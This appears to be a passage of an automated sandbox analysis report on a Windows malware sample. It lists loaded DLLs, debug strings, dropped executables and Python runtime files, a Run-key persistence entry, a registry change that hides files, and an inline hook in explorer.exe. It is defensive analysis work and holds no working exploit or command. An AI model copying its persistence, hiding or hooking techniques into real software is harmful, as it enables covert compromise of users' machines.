          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: libffi-7.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064520856.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064896907.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.17.dr
          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061121081.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
          Source: Binary string: ucrtbase.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062000144.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060653755.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.17.dr
          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063366831.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064195340.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065057061.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: el.pdb..*_7y source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077350907.00007FFE13321000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.17.dr
          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061481679.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063629133.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063097579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.17.dr
          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064066874.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060774088.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
          Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062380579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060399599.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060993419.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063927305.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, select.pyd.17.dr
          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062650438.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
          Source: Binary string: ucrtbase.pdbUGP source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
          Source: Binary string: vcruntime140.amd64.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065357794.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061370875.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
          Source: Binary string: el.pdb source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063235629.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062246272.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060529722.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.17.dr
          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063763840.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
          Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061860819.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064634549.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062506692.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062119686.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065508474.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062783484.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063492265.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.17.dr
          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062952516.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061257377.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064769321.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061739114.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061629125.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.17.dr
          Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064404985.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065202903.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr
          Source: 4A64.tmp.x.exe.4.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831050 LoadLibraryA,GetProcAddress,0_2_00007FF63A831050
          Source: libcrypto-1_1.dll.17.drStatic PE information: section name: .00cfg
          Source: C:\Windows\explorer.exeCode function: 4_2_0A05EB88 push rsp; retn 0000h4_2_0A05EB89
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04D892 push rax; ret 4_2_0A04D899
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04D912 push rsp; retn 0003h4_2_0A04D929
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37D892 push rax; ret 4_2_0C37D899
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37D912 push rsp; retn 0003h4_2_0C37D929
          Source: C:\Windows\explorer.exeCode function: 4_2_0C38EB88 push rsp; retn 0000h4_2_0C38EB89
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8DEB88 push rsp; retn 0000h4_2_0E8DEB89
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CD892 push rax; ret 4_2_0E8CD899
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CD912 push rsp; retn 0003h4_2_0E8CD929
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeCode function: 9_2_01378E49 push F8B870DBh; retf 9_2_01378E4E
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4FAED push rdi; ret 18_2_00007FFDFFC4FAF4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4A5B5 push rdi; ret 18_2_00007FFDFFC4A5BB
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC50200 push rdi; ret 18_2_00007FFDFFC50206
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4A096 push rdi; ret 18_2_00007FFDFFC4A0A2
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE1333CB1B push rbp; retf 18_2_00007FFE1333CB28
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\ucrtbase.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pydJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\select.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\VCRUNTIME140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\python38.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\unicodedata.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26522\libffi-7.dllJump to dropped file
          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Changes the view of files in windows explorer (hidden files and folders)
          Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F4710 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAdd